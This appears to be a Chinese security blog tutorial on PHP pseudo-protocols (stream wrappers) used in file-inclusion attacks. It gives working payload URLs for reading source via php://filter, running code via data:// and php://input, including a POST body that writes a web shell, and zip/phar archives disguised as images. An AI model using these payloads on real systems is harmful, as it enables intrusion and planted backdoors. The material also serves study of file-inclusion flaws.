PHP伪协议-源码读取、文件读写、任意php命令执行
前言:
介绍:
博主:网络安全领域狂热爱好者。
殊荣:华为云博主、CSDN网络安全领域优质创作者(CSDN:黑色地带(崛起)),2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。
擅长:对于技术、工具、漏洞原理、黑产打击的研究。
导读:
面向读者:对于网络安全方面的学者。
本文知识点:
(1)PHP伪协议-源码读取、文件读写、任意php命令执行(√)
目录
2.4、phar://、zip://、bzip2://、zlib://
一、简介
1.1、概述:
PHP 伪协议 是 PHP 支持的协议与封装协议,可利用这些协议完成许多命令执行
1.2、12个php支持的伪协议
1.3、前提:
php.ini里有两个参数
allow_url_fopen:允许url里的封装协议访问文件(默认ON)
allow_url_include:不允许包含url里的封装协议包含文件(默认OFF)
二、示例
2.1、file://
前提:
allow_url_fopen:off/on
allow_url_include :off/on
即不受allow_url_fopen与allow_url_include的影响
用法:
file://文件绝对路径
?file=file://D:/xxxx/1.txt
file=相对路径
?file=./1.txt
file=网址路径
?file=http://127.0.0.1/1.txt
2.2、php:// 协议
前提:
allow_url_fopen:off/on
allow_url_include :开on的有php://input php://stdin php://memory php://temp
协议 介绍 php://input 1、可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分
2、在enctype="multipart/form-data" 的时候php://input 是无效的
php://output 只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区 php://fd (>=5.3.6)允许直接访问指定的文件描述符 php://memory php://temp 1、(>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据
2、两者的唯一区别是 php://memory 总是把数据储存在内存中,而 php://temp 会在内存量达到预定义的限制后(默认是 2MB)存入临时文件中。临时文件位置的决定和 sys_get_temp_dir() 的方式一致。
php://filter 1、(>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用
2、对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file() 和 file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。
php://input
allow_url_fopen=on 和 allow_url_include=on
POST提交PHP代码,造成任意代码执行,如写入文件(木马)
php://input + [POST DATA]
eg:
URL中:……?file=http://input
POST中:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST['123'])?>');?>
php://filter
读取文件源码
php://filter可获取指定文件源码,如果再利用包含函数漏洞,php://filter流会被当作php文件执行,一般对其进行编码,使其不被执行,获取到编码后解码,从而达到任意文件的读取
……?file=php://filter/read=convert.base64-encode/resource=文件路径
2.3、data://
前提:
allow_url_fopen:on
allow_url_include :on
简介:
数据流封装器,以传递相应格式的数据
可以用来执行PHP代码
用法:
data://text/plain,内容</p> <p>data://text/plain;base64,base64加密内容
示例:
……?file=data://text/plain,<?php%20phpinfo();?>
……?file=data://text/plain;base64,base64加密后内容
2.4、phar://、zip://、bzip2://、zlib://
简介:
用于读取压缩文件,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀
前提:
allow_url_fopen:off/on
allow_url_include :off/on
用法:
phar://[压缩文件路径]/[压缩文件内的子文件名]
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](%23为#)
compress.bzip2://file.bz2
示例:
1、将php文件添加到压缩文件中(phar)
……?file=phar://D:/……1.zip/1.php
2、将php文件添加到1.zip中,并将1.zip重命名为1.jpg,再上传到目标服务器(zip)
……?file=zip://D:/……1.jpg%231.php
3、压缩1.php为1.bz2(bzip2)
……?file=compress.bzip2://D:/……1.bz2
- 点赞
- 收藏
- 关注作者
评论(0)